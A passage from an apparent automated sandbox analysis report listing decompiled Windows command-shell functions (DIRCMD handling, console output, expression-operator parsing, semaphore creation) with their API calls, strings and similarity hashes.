					_v92 = _t228;
					_v100 = _t167;
					if(_t276 == 0) {
						goto L93;
					}
					if(_t167 == 0) {
						L19:
						if(_t276 == 0) {
							goto L93;
						}
						goto L20;
					}
					_t260 =  *_t228 & 0x0000ffff;
					if(_t260 == 0) {
						goto L19;
					}
					 *_t229 = _t260;
					_t229 =  &(_t229[0]);
					_t228 =  &(_t228[1]);
					_t276 = _t276 - 1;
					_t167 = _t167 - 1;
					_t173 = _t173 + 1;
				}
				goto L93;
			}

0x00338f70
0x00338f75
0x00338f77
0x00338f7c
0x00338f87
0x00338f88
0x00338f8e
0x00338f93
0x00338f98
0x00338f9c
0x00338fa4
0x00338fa7
0x00338faa
0x00338fb1
0x00338fb3
0x00338fb6
0x00338fb8
0x00338fbb
0x00338fc3
0x00338fc8
0x00338fcd
0x003508a4
0x003508a9
0x00339369
0x00339369
0x0033936c
0x0033936c
0x003390d3
0x003390d3
0x003390da
0x003390e4
0x003390f2
0x003390f2
0x003508b2
0x003508b8
0x003508b8
0x003508bd
0x00339366
0x00339366
0x00000000
0x00339366
0x003508c6
0x003508cc
0x003508cc
0x003508cf
0x003508d3
0x00339096
0x00339098
0x0033909b
0x0033909e
0x003390a1
0x003390a1
0x003390aa
0x003390b4
0x003390b6
0x003390bd
0x003390fc
0x00000000
0x00339102
0x00339102
0x00339105
0x0033910b
0x003391ef
0x003391f2
0x00339205
0x00339207
0x0033920a
0x0033920f
0x0033922a
0x0033922a
0x0033922c
0x0033922c
0x00339230
0x00339230
0x00339233
0x00339236
0x00339241
0x003393b6
0x003393b8
0x003393b8
0x003393c0
0x003393c0
0x003393c3
0x003393c6
0x003393cd
0x00339249
0x0033924b
0x003508ed
0x0033926d
0x0033926d
0x00339270
0x00339277
0x00339377
0x0033937a
0x0033937c
0x0033937c
0x00339380
0x00339380
0x00339383
0x00339386
0x0033935d
0x0033935f
0x003392c7
0x003392c7
0x003392ca
0x003392cc
0x003392cc
0x003392d0
0x003392d0
0x003392d3
0x003392d6
0x003392e2
0x003392e7
0x003392f1
0x003508f6
0x003508f6
0x003392f7
0x003392fd
0x00339300
0x00339303
0x0033930a
0x003508ff
0x003508ff
0x00350902
0x00000000
0x00339310
0x00339315
0x003391e2
0x003391e2
0x003391e4
0x003391e7
0x00000000
0x003391e7
0x0033930a
0x0033927d
0x00339280
0x00339293
0x00339295
0x0033929a
0x0033938d
0x00339390
0x00339393
0x00339393
0x00339396
0x00339399
0x003393a2
0x003393a4
0x003393a9
0x003393af
0x003393af
0x003393a9
0x003392a0
0x003392a3
0x003392a6
0x003392a8
0x003392a8
0x003392b0
0x003392b0
0x003392b3
0x003392b6
0x003392c1
0x0033934d
0x0033934f
0x0033934f
0x00339352
0x00339352
0x00339355
0x00339358
0x00000000
0x00339352
0x00000000
0x003392c1
0x00339251
0x00339253
0x00339253
0x00339256
0x00339256
0x00339259
0x0033925c
0x00339267
0x003393d4
0x003393d6
0x003393d6
0x003393e0
0x003393e0
0x003393e3
0x003393e6
0x003393ed
0x003393ed
0x00000000
0x00339267
0x00339247
0x00000000
0x00339247
0x00339211
0x00339213
0x00339213
0x00339216
0x00339216
0x00339219
0x0033921c
0x00339225
0x00339227
0x00000000
0x00339227
0x00339114
0x0035090a
0x0035090d
0x00350910
0x0033911a
0x0033911a
0x0033911a
0x00339121
0x00339123
0x00339126
0x00339128
0x00339128
0x0033912e
0x00000000
0x00000000
0x00339135
0x00339138
0x0033913b
0x0033913b
0x00339143
0x0035091c
0x0035091c
0x00000000
0x0035091c
0x0033914b
0x0033914d
0x0033914f
0x00350924
0x00350929
0x00000000
0x00000000
0x00350933
0x00350938
0x0035093e
0x00350944
0x00350944
0x00350948
0x00350960
0x00000000
0x00350960
0x00339155
0x00339158
0x0033915a
0x0033915d
0x0033915d
0x0033915f
0x00339162
0x00339168
0x00000000
0x00000000
0x00339170
0x00339170
0x00339179
0x0033917c
0x00000000
0x00000000
0x00339182
0x00339185
0x0033918c
0x00339194
0x0033919a
0x00000000
0x00000000
0x003391a2
0x003391a7
0x003391ac
0x003391af
0x003391b2
0x003391b2
0x003391b7
0x003391bd
0x003391c2
0x00000000
0x00000000
0x00339322
0x00339325
0x00339326
0x0033932d
0x00000000
0x00000000
0x00339334
0x00339339
0x0033933f
0x00339342
0x00339345
0x00339345
0x003391c8
0x003391cb
0x003391ce
0x003391d1
0x003391d4
0x003391d7
0x003391dd
0x00000000
0x00000000
0x003391df
0x00000000
0x003391df
0x003390fc
0x003390bf
0x003390c9
0x003390cb
0x003390cd
0x003390d0
0x00000000
0x003390d0
0x00338fd3
0x00338fd5
0x00338fd8
0x00338fda
0x00338fe0
0x00338fe0
0x00338fe6
0x00000000
0x00000000
0x00338fe8
0x00338fef
0x00000000
0x00338ffa
0x00338ffa
0x00338ffa
0x00338ffd
0x00339000
0x00000000
0x00339000
0x00338fef
0x0033900e
0x00000000
0x00000000
0x00339014
0x00339019
0x00000000
0x00000000
0x00339023
0x0033902c
0x0033902e
0x00339033
0x00000000
0x00000000
0x00339039
0x00339039
0x0033903e
0x00000000
0x00000000
0x00339046
0x003508dd
0x00000000
0x00000000
0x003508e3
0x003508e5
0x00000000
0x003508e5
0x00339051
0x00000000
0x00000000
0x00339057
0x00339059
0x0033905b
0x0033905d
0x0033905d
0x00339060
0x00339063
0x00339066
0x00339069
0x0033906e
0x00000000
0x00000000
0x00339076
0x0033908e
0x00339090
0x00000000
0x00000000
0x00000000
0x00339090
0x00339078
0x0033907e
0x00000000
0x00000000
0x00339080
0x00339083
0x00339086
0x00339089
0x0033908a
0x0033908b
0x0033908b
0x00000000

APIs

Part of subcall function 003400B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0033DF68,00000001,?,00000000,00343458,-00000105,0035BDD8,00000240,00344B82,00000000,00000000,0034AE6E,00000000), ref: 003400C1
Part of subcall function 003400B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0033DF68,00000001,?,00000000,00343458,-00000105,0035BDD8,00000240,00344B82,00000000,00000000,0034AE6E,00000000,?), ref: 003400C8

_wcsnicmp.MSVCRT ref: 003391B7
wcstol.MSVCRT ref: 003391FC
wcstol.MSVCRT ref: 0033928A
longjmp.MSVCRT(?,000000FF,D59BD0E8,-00000002,?,00000000), ref: 003508B2
longjmp.MSVCRT(?,000000FF), ref: 003508C6

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Heaplongjmpwcstol$AllocProcess_wcsnicmp
String ID:
API String ID: 2863075230-0
Opcode ID: 729da1b5cf26bf654f8fe20b253ad041dafeb78dad111738e31eda9b7911ac2f
Instruction ID: 0d3b3f3c13166f9fe9c9d2afaee9bc1a5d8e4a4743effc62bc845baeef132b7e
Opcode Fuzzy Hash: 729da1b5cf26bf654f8fe20b253ad041dafeb78dad111738e31eda9b7911ac2f
Instruction Fuzzy Hash: 85F1C375D00216CBCB2ADF98C8C07BEB7B5BF88710F16421AD816AB794E7B16D45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00344F66, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00344F66(intOrPtr __ecx, signed int __edx) {
				signed int _v8;
				long _v20;
				char _v24;
				WCHAR* _v28;
				void _v548;
				int _v556;
				char _v560;
				void* _v564;
				char _v1076;
				void _v1084;
				void* _v1096;
				int _v1100;
				WCHAR* _v1104;
				WCHAR* _v1108;
				char _v1112;
				WCHAR* _v1116;
				int _v1120;
				void* _v1124;
				intOrPtr _v1128;
				void* _v1138;
				int _v1142;
				int _v1146;
				int _v1150;
				int _v1154;
				int _v1158;
				int _v1162;
				int _v1166;
				int _v1170;
				short _v1172;
				int _v1176;
				WCHAR* _v1180;
				int _v1184;
				char _v1188;
				int _v1192;
				int _v1196;
				intOrPtr _v1200;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t78;
				WCHAR* _t97;
				signed int _t101;
				char _t112;
				void* _t113;
				void* _t135;
				void* _t139;
				intOrPtr _t140;
				signed int _t141;
				signed int _t143;
				signed int _t144;

				_t130 = __edx;
				_t143 = (_t141 & 0xfffffff8) - 0x4ac;
				_t78 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t78 ^ _t143;
				_v1200 = __ecx;
				_v1180 = 0;
				_v1172 = 0;
				_v1196 = 0;
				_v1192 = 0;
				_v1188 = 0;
				_t112 = 1;
				_v1184 = 0;
				_v1176 = 0;
				_v1170 = 0;
				_v1166 = 0;
				_v1162 = 0;
				_v1158 = 0;
				_v1154 = 0;
				_v1150 = 0;
				_v1146 = 0;
				_v1142 = 0;
				asm("stosd");
				_v564 = 0;
				asm("stosd");
				_v560 = 1;
				_v556 = 0x104;
				asm("stosd");
				asm("stosw");
				_v1124 = 0;
				_v1120 = 0;
				_v1116 = 0;
				_v1112 = 0;
				_v1108 = 0;
				_v1104 = 0;
				_v1100 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				memset( &_v1084, 0, 0x104);
				_t144 = _t143 + 0xc;
				if(E00340C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L14:
					__imp__??_V@YAXPAX@Z(_v564);
					_pop(_t135);
					_pop(_t139);
					_pop(_t113);
					return E00346FD0(_t112, _t113, _v8 ^ _t144, _t130, _t135, _t139);
				}
				_t140 =  *0x373cd8;
				_v1192 = 6;
				_v20 = 0x104;
				_v1188 = 0;
				_v1196 = 0x8000;
				_v1124 = 0;
				_v1104 = 0;
				_v28 = 0;
				_v24 = 1;
				memset( &_v548, 0, 0x104);
				_t144 = _t144 + 0xc;
				if(E00340C70( &_v548, GetEnvironmentVariableW(L"DIRCMD", 0, 0)) < 0) {
					L13:
					__imp__??_V@YAXPAX@Z(_v28);
					goto L14;
				}
				_t97 = _v28;
				if(_t97 == 0) {
					_t97 =  &_v548;
				}
				if(GetEnvironmentVariableW(L"DIRCMD", _t97, _v20) != 0) {
					_t122 = _v28;
					if(_v28 == 0) {
						_t122 =  &_v548;
					}
					if(E0033CB48( &_v1196) == _t112) {
						_push(0);
						_push(0x2377);
						E0033C5A2(_t122);
					}
				}
				_t130 =  &_v1196;
				if(E0033CB48( &_v1196) != _t112) {
					_t101 = _v1196;
					if((_t101 & 0x00000040) != 0) {
						_t101 = _t101 & 0xfffb79fb;
						_v1196 = _t101;
					}
					if((_t101 & 0x00000400) != 0) {
						_v1196 = _t101 & 0xfffffdbb;
					}
					_t124 = _v564;
					if(_v564 == 0) {
						_t124 =  &_v1084;
					}
					_t130 = _v556;
					E003436CB(_t112, _t124, _v556, 0);
					if(_v1128 == 0) {
						_t125 = _v564;
						_v1124 = _t112;
						if(_v564 == 0) {
							_t125 =  &_v1084;
						}
						_v1120 = E0034297B(_t125);
						_v1112 = _t112;
						_v1116 = 0;
						_v1108 = 0;
					}
					_t112 = E00342DD2( &_v1188, _t130);
					_t106 = _v556;
					if(_v556 == 0) {
						_t106 =  &_v1076;
					}
					E00340BFC(_t106, _v548);
					E00342A06(_t140, 0);
				}
				goto L13;
			}

0x00344f66
0x00344f6e
0x00344f74
0x00344f7b
0x00344f85
0x00344f8b
0x00344f8f
0x00344f98
0x00344fa0
0x00344fa9
0x00344fad
0x00344fae
0x00344fb2
0x00344fb6
0x00344fba
0x00344fbe
0x00344fc2
0x00344fc6
0x00344fca
0x00344fce
0x00344fd2
0x00344fd6
0x00344fd9
0x00344fe0
0x00344fe1
0x00344fe8
0x00344fef
0x00344ff0
0x00344ff4
0x00344ffc
0x00345000
0x00345004
0x00345008
0x0034500c
0x00345010
0x00345014
0x00345015
0x00345016
0x0034501f
0x0034502d
0x0034504a
0x00345176
0x0034517d
0x0034518d
0x0034518e
0x0034518f
0x0034519a
0x0034519a
0x00345050
0x0034505d
0x00345066
0x00345076
0x0034507a
0x00345082
0x00345086
0x0034508a
0x00345091
0x00345098
0x0034509d
0x003450bc
0x00345168
0x0034516f
0x00000000
0x00345175
0x003450c2
0x003450cb
0x003450cd
0x003450cd
0x003450e9
0x0034f084
0x0034f08d
0x0034f08f
0x0034f08f
0x0034f0a1
0x0034f0a7
0x0034f0a8
0x0034f0ad
0x0034f0b3
0x0034f0a1
0x003450f3
0x003450fe
0x00345100
0x00345106
0x00345108
0x0034510d
0x0034510d
0x00345116
0x0034f0be
0x0034f0be
0x0034511c
0x00345125
0x0034519b
0x0034519b
0x00345127
0x0034512f
0x00345138
0x0034f0c7
0x0034f0ce
0x0034f0d4
0x0034f0d6
0x0034f0d6
0x0034f0e2
0x0034f0e6
0x0034f0ea
0x0034f0ee
0x0034f0ee
0x00345147
0x00345149
0x00345152
0x003451a4
0x003451a4
0x0034515c
0x00345163
0x00345163
0x00000000

APIs

memset.MSVCRT ref: 0034501F

Part of subcall function 00340C70: ??_V@YAXPAX@Z.MSVCRT ref: 00340CBA
Part of subcall function 00340C70: memset.MSVCRT ref: 00340CDD

memset.MSVCRT ref: 00345098
GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,00000000,00000000,?,?,-00000001,?,00000002,00000000), ref: 003450A7
GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,?,?,00000000,?,?,-00000001,?,00000002,00000000), ref: 003450E1
??_V@YAXPAX@Z.MSVCRT ref: 0034516F
??_V@YAXPAX@Z.MSVCRT ref: 0034517D

Strings

DIRCMD, xrefs: 003450A2, 003450DC

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$EnvironmentVariable
String ID: DIRCMD
API String ID: 1405722092-1465291664
Opcode ID: 66b5da24a5e4dc51733baae4aedeb70feacdc92596b9acbd1fc6861f47575c62
Instruction ID: 8dca2c3805dad86e2f62befbd1175d6f43dfa29990a32f518caddfde651fcc46
Opcode Fuzzy Hash: 66b5da24a5e4dc51733baae4aedeb70feacdc92596b9acbd1fc6861f47575c62
Instruction Fuzzy Hash: 5D715AB1A0C7819FD765CF29D88569BBBE4BFC5304F10492EF1898B261DB30A808CB57

Uniqueness

Uniqueness Score: -1.00%

Function 0035196F, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0035196F(void** __ecx, intOrPtr _a4, signed int _a12, signed int _a16) {
				void* _v0;
				signed int _v8;
				char _v532;
				void** _v536;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				short* _t26;
				void* _t29;
				void* _t31;
				signed int* _t38;
				void** _t40;
				long _t41;
				signed int _t42;
				signed int _t47;
				char* _t48;
				void* _t55;
				signed int _t57;
				signed int _t59;
				signed int _t60;
				void* _t61;
				void* _t63;
				void* _t64;
				signed int _t65;

				_t20 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t20 ^ _t65;
				_t59 = _a12;
				_t40 = __ecx;
				_v536 = __ecx;
				_t24 = _t59 & 0x80000000 | _a16;
				if((_t59 & 0x80000000 | _a16) != 0) {
					E003480F2(_t24);
				}
				E00341040( &_v532, 0x104, _a4);
				_t57 = 0x104;
				_t26 =  &_v532;
				while( *_t26 != 0) {
					_t26 = _t26 + 2;
					_t57 = _t57 - 1;
					if(_t57 != 0) {
						continue;
					}
					break;
				}
				asm("sbb ecx, ecx");
				_t47 =  ~_t57 & 0x00000104 - _t57;
				if(_t57 != 0) {
					_t38 =  &_v532 + _t47 * 2;
					_t64 = 0x104 - _t47;
					if(_t64 == 0) {
						L14:
						_t38 = _t38 - 2;
					} else {
						_t55 = 0x7ffffffe;
						_t57 = L"_p0" - _t38;
						while(_t55 != 0) {
							_t42 =  *(_t38 + _t57) & 0x0000ffff;
							if(_t42 == 0) {
								break;
							} else {
								 *_t38 = _t42;
								_t55 = _t55 - 1;
								_t38 =  &(_t38[0]);
								_t64 = _t64 - 1;
								if(_t64 != 0) {
									continue;
								} else {
									L13:
									_t40 = _v536;
									goto L14;
								}
							}
							goto L16;
						}
						if(_t64 != 0) {
							_t40 = _v536;
						} else {
							goto L13;
						}
					}
					L16:
					 *_t38 = 0;
				}
				_t60 = _t59 & 0x7fffffff;
				_t29 = _t60;
				if(_t60 <= 0) {
					_t29 = 1;
				}
				_t48 =  &_v532;
				__imp__CreateSemaphoreExW(0, _t60, _t29, _t48, 0, 0x1f0003);
				_t61 = _t29;
				if(_t61 == 0) {
					_t57 = 0x1621;
					_t63 = E00352913("internal\\sdk\\inc\\wil\\ResultMacros.h");
					if(_t63 >= 0) {
						goto L25;
					} else {
						_t57 = 0x84;
						E0035292C("wil", _t63);
						_t31 = _t63;
					}
				} else {
					_t63 =  *_t40;
					if(_t63 != 0) {
						_t41 = GetLastError();
						if(CloseHandle(_t63) == 0) {
							_push(_t48);
							_t57 = 0x879;
							E00352D56();
						}
						SetLastError(_t41);
						_t40 = _v536;
					}
					 *_t40 = _t61;
					L25:
					_t31 = 0;
				}
				return E00346FD0(_t31, _t40, _v8 ^ _t65, _t57, _t61, _t63);
			}

0x0035197a
0x00351981
0x00351987
0x0035198a
0x0035198e
0x00351999
0x0035199c
0x0035199e
0x0035199e
0x003519b3
0x003519b8
0x003519ba
0x003519c0
0x003519c6
0x003519c9
0x003519cc
0x00000000
0x00000000
0x00000000
0x003519cc
0x003519d6
0x003519d8
0x003519dc
0x003519e4
0x003519e7
0x003519e9
0x00351a1c
0x00351a1c
0x003519eb
0x003519f0
0x003519f5
0x003519f7
0x003519fb
0x00351a02
0x00000000
0x00351a04
0x00351a04
0x00351a07
0x00351a08
0x00351a0b
0x00351a0e
0x00000000
0x00351a10
0x00351a16
0x00351a16
0x00000000
0x00351a16
0x00351a0e
0x00000000
0x00351a02
0x00351a14
0x00351a21
0x00000000
0x00000000
0x00000000
0x00351a14
0x00351a27
0x00351a29
0x00351a29
0x00351a2c
0x00351a32
0x00351a34
0x00351a36
0x00351a36
0x00351a42
0x00351a4d
0x00351a53
0x00351a57
0x00351aa7
0x00351ab6
0x00351aba
0x00000000
0x00351abc
0x00351abf
0x00351aca
0x00351acf
0x00351acf
0x00351a59
0x00351a59
0x00351a5d
0x00351a66
0x00351a70
0x00351a72
0x00351a76
0x00351a7b
0x00351a7b
0x00351a81
0x00351a87
0x00351a87
0x00351a8d
0x00351a8f
0x00351a8f
0x00351a8f
0x00351aa1

APIs

CreateSemaphoreExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,?,00000000,001F0003,00000000,?,?,00000000), ref: 00351A4D
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00351A5F
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000104), ref: 00351A68
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00351A81

Strings

internal\sdk\inc\wil\ResultMacros.h, xrefs: 00351AAC
wil, xrefs: 00351AC5
_p0, xrefs: 003519EB

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: ErrorLast$CloseCreateHandleSemaphore
String ID: _p0$internal\sdk\inc\wil\ResultMacros.h$wil
API String ID: 2276426104-46676964
Opcode ID: ce041245e1c9049c0d2bbec3ebae9ddc50b63236179a5a8e14ae337bb72fcf73
Instruction ID: 9796b563b1485b27db3ebd9feb129e2c00835733647598eec4bbef1b5ce661ce
Opcode Fuzzy Hash: ce041245e1c9049c0d2bbec3ebae9ddc50b63236179a5a8e14ae337bb72fcf73
Instruction Fuzzy Hash: F4411531B411299BDB279F28C995FAA33B9EF85311F154259EC05DB3A0DB70DD48C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00336785, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00336785(signed short** __ecx, signed short** __edx, void* __eflags, signed short** _a4) {
				signed short* _t8;
				signed short _t9;
				long _t13;
				signed short** _t18;
				signed short _t25;
				long _t32;
				wchar_t* _t33;
				signed short** _t34;

				_t18 = __edx;
				_t34 = __ecx;
				E00339794(__ecx);
				_t32 =  *( *_t34) & 0x0000ffff;
				if(_t32 == 0 || iswdigit(_t32) != 0 || wcschr(L"<>+-*/%()|^&=,", _t32) != 0) {
					L12:
					return 0;
				} else {
					_t33 = L"+-~!";
					if(wcschr(_t33, _t32) != 0) {
						goto L12;
					}
					_t8 =  *_t34;
					 *_t18 = _t8;
					while(1) {
						_t9 =  *_t8 & 0x0000ffff;
						_t25 = _t9;
						if(_t9 == 0) {
							break;
						}
						_t13 = _t25 & 0x0000ffff;
						if(_t13 <= 0x20 || wcschr(_t33, _t13) != 0 || wcschr(L"<>+-*/%()|^&=,",  *( *_t34) & 0x0000ffff) != 0) {
							break;
						} else {
							 *_t34 =  &(( *_t34)[1]);
							_t8 =  *_t34;
							continue;
						}
					}
					 *_a4 =  *_t34;
					return 1;
				}
			}

0x0033678d
0x0033678f
0x00336791
0x00336798
0x0033679e
0x00336828
0x00000000
0x003367c2
0x003367c3
0x003367d3
0x00000000
0x00000000
0x003367d5
0x003367d7
0x003367d9
0x003367d9
0x003367dc
0x003367e1
0x00000000
0x00000000
0x003367e3
0x003367e9
0x00000000
0x00336810
0x00336810
0x00336813
0x00000000
0x00336813
0x003367e9
0x0033681c
0x00000000
0x00336820

APIs

iswdigit.MSVCRT ref: 003367A5
wcschr.MSVCRT ref: 003367B6
wcschr.MSVCRT ref: 003367C9
wcschr.MSVCRT ref: 003367ED
wcschr.MSVCRT ref: 00336804

Strings

+-~!, xrefs: 003367C3, 003367C8, 003367EC
<>+-*/%()|^&=,, xrefs: 003367B1, 003367FF

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: wcschr$iswdigit
String ID: +-~!$<>+-*/%()|^&=,
API String ID: 2770779731-632268628
Opcode ID: 70272050b8d91c676b01bb3743c53b56b7e3d80060114ebf254d6963b8b4069d
Instruction ID: 4300e9dd5d5625b288f405c5e8d5875f4bdf1e5d68bdcc1e0eaf7fb4653c0041
Opcode Fuzzy Hash: 70272050b8d91c676b01bb3743c53b56b7e3d80060114ebf254d6963b8b4069d
Instruction Fuzzy Hash: 3C119476204202AFAB265B1AE88997677ECEF9E771B21442EF485CB590FB21DC009660

Uniqueness

Uniqueness Score: -1.00%

Function 0033B610, Relevance: 12.2, APIs: 8, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0033B610(void* __ebx, void** __ecx, void* __edi) {
				void _v8;
				intOrPtr _v12;
				void* _v16;
				void* _t37;
				intOrPtr _t39;
				void* _t40;
				void* _t52;
				long _t55;
				long _t56;
				void* _t57;
				long _t61;
				void* _t66;
				long _t73;
				void* _t85;
				void* _t87;
				void** _t101;
				long _t104;

				_t101 = __ecx;
				_t37 = E0034269C(E0033B6B9(__ecx));
				_t104 = _t101[4];
				if(_t37 != 0) {
					_t39 = _t104 + _t101[2] * 2;
					_v12 = _t39;
					__eflags = _t104 - _t39;
					if(_t104 < _t39) {
						_t85 = 0x2022;
						while(1) {
							_t73 = _t104;
							__eflags = _t104 - _t39;
							if(_t104 >= _t39) {
								goto L3;
							} else {
								goto L12;
							}
							while(1) {
								L12:
								__eflags =  *_t73 - _t85;
								if( *_t73 == _t85) {
									break;
								}
								_t73 = 2 + _t73;
								__eflags = _t73 - _t39;
								if(_t73 < _t39) {
									continue;
								}
								break;
							}
							__eflags = _t73 - _t104;
							if(_t73 == _t104) {
								goto L20;
							} else {
								_t66 = _t73 - _t104 >> 1;
								_v16 = _t66;
								__imp___get_osfhandle(0);
								_t54 = WriteConsoleW(_t66, 1, _t104, _t66,  &_v8);
								__eflags = _t54;
								if(_t54 == 0) {
									goto L30;
								} else {
									_t54 = _v16;
									__eflags = _v8 - _v16;
									if(_v8 != _v16) {
										goto L30;
									} else {
										_t39 = _v12;
										_t104 = _t73;
										_t85 = 0x2022;
										while(1) {
											L20:
											__eflags = _t73 - _t39;
											if(_t73 >= _t39) {
												break;
											}
											__eflags =  *_t73 - _t85;
											if( *_t73 == _t85) {
												_t73 = 2 + _t73;
												__eflags = _t73;
												continue;
											}
											break;
										}
										__eflags = _t73 - _t104;
										if(_t73 == _t104) {
											L27:
											_t85 = 0x2022;
											__eflags = _t104 - _t39;
											if(_t104 < _t39) {
												continue;
											} else {
												goto L3;
											}
										} else {
											__eflags =  *_t101;
											if( *_t101 != 0) {
												SetConsoleMode( *_t101, 2);
											}
											_t52 = _t73 - _t104 >> 1;
											_v16 = _t52;
											__imp___get_osfhandle(_t104, _t52,  &_v8, 0);
											_t87 = 1;
											_t104 = WriteConsoleW(_t52, ??, ??, ??, ??);
											_t54 = E003406C0(_t87);
											__eflags = _t104;
											if(_t104 == 0) {
												goto L30;
											} else {
												_t54 = _v16;
												__eflags = _v8 - _v16;
												if(_v8 != _v16) {
													goto L30;
												} else {
													_t39 = _v12;
													_t104 = _t73;
													goto L27;
												}
											}
										}
									}
								}
							}
							goto L38;
						}
					}
					goto L3;
				} else {
					if(E003427C8(_t101[2] + _t101[2], _t104, _t101[2] + _t101[2],  &_v8) == 0) {
						L30:
						_t89 = 1;
						_t55 = E00340178(_t54);
						__eflags = _t55;
						if(_t55 == 0) {
							_t89 = 1;
							_t56 = E00359953(_t55, 1);
							__eflags = _t56;
							if(_t56 == 0) {
								_push(_t56);
								_push(0x70);
								goto L34;
							}
						} else {
							_push(0);
							_push(0x1d);
							L34:
							E0033C5A2(_t89);
							_pop(_t89);
						}
						_t57 = E00359287(_t89);
						__imp__longjmp(0x36b8b8, 1);
						asm("int3");
						__eflags =  *(_t104 + 4) - _t57;
						if(__eflags < 0) {
							return _t57;
						} else {
							E00353BB0(__eflags, 0);
							 *(_t104 + 4) =  *(_t104 + 4) & 0x00000000;
							E00344F29(_t104);
							_t61 =  *((intOrPtr*)(_t104 + 0x1c)) - 1;
							__eflags = _t61;
							 *(_t104 + 0x24) = _t61;
							return _t61;
						}
					} else {
						_t70 = _t101[2];
						_t54 = _t101[2] + _t70;
						if(_v8 != _t101[2] + _t70) {
							goto L30;
						} else {
							L3:
							_t40 = E0034269C(_t39);
							if(_t40 != 0) {
								__imp___get_osfhandle(0);
								WriteConsoleW( &_v8, 1, L"\r\n", 2,  &_v8);
							} else {
								E003427C8( &_v8, L"\r\n", 4,  &_v8);
							}
							_t101[1] = _t101[1] + E0033BED7(_t101, _t101[4]) + 1;
							E0033B6B9(_t101);
							if(_t101[1] > _t101[7]) {
								_t101[1] = _t101[1] & 0x00000000;
							}
							 *(_t101[4]) = 0;
							_t101[2] = _t101[2] & 0;
							return 0;
						}
					}
				}
				L38:
			}

0x0033b61b
0x0033b625
0x0033b62a
0x0033b62f
0x0034983d
0x00349840
0x00349843
0x00349845
0x0034984b
0x00349850
0x00349850
0x00349852
0x00349854
0x00000000
0x00000000
0x00000000
0x00000000
0x0034985a
0x0034985a
0x0034985a
0x0034985d
0x00000000
0x00000000
0x0034985f
0x00349862
0x00349864
0x00000000
0x00000000
0x00000000
0x00349864
0x00349866
0x00349868
0x00000000
0x0034986a
0x00349874
0x0034987a
0x0034987d
0x00349885
0x0034988b
0x0034988d
0x00000000
0x00349893
0x00349893
0x00349896
0x00349899
0x00000000
0x0034989f
0x0034989f
0x003498a2
0x003498a4
0x003498b3
0x003498b3
0x003498b3
0x003498b5
0x00000000
0x00000000
0x003498ab
0x003498ae
0x003498b0
0x003498b0
0x00000000
0x003498b0
0x00000000
0x003498ae
0x003498b7
0x003498b9
0x00349903
0x00349903
0x00349908
0x0034990a
0x00000000
0x00349910
0x00000000
0x00349910
0x003498bb
0x003498bb
0x003498be
0x003498c4
0x003498c4
0x003498d4
0x003498da
0x003498dd
0x003498e3
0x003498eb
0x003498ed
0x003498f2
0x003498f4
0x00000000
0x003498f6
0x003498f6
0x003498f9
0x003498fc
0x00000000
0x003498fe
0x003498fe
0x00349901
0x00000000
0x00349901
0x003498fc
0x003498f4
0x003498b9
0x00349899
0x0034988d
0x00000000
0x00349868
0x00349850
0x00000000
0x0033b635
0x0033b64b
0x00349934
0x00349936
0x00349937
0x0034993c
0x0034993e
0x00349948
0x00349949
0x0034994e
0x00349950
0x00349952
0x00349953
0x00000000
0x00349953
0x00349940
0x00349940
0x00349942
0x00349955
0x00349955
0x0034995b
0x0034995b
0x0034995c
0x00349968
0x0034996e
0x0034996f
0x00349972
0x0033b6ca
0x00349978
0x0034997a
0x0034997f
0x00349985
0x0034998d
0x0034998d
0x0034998e
0x00349992
0x00349992
0x0033b651
0x0033b651
0x0033b654
0x0033b659
0x00000000
0x0033b65f
0x0033b65f
0x0033b662
0x0033b66c
0x00349921
0x00349929
0x0033b672
0x0033b67d
0x0033b67d
0x0033b68f
0x0033b692
0x0033b69d
0x0033b6b3
0x0033b6b3
0x0033b6a4
0x0033b6a7
0x0033b6b2
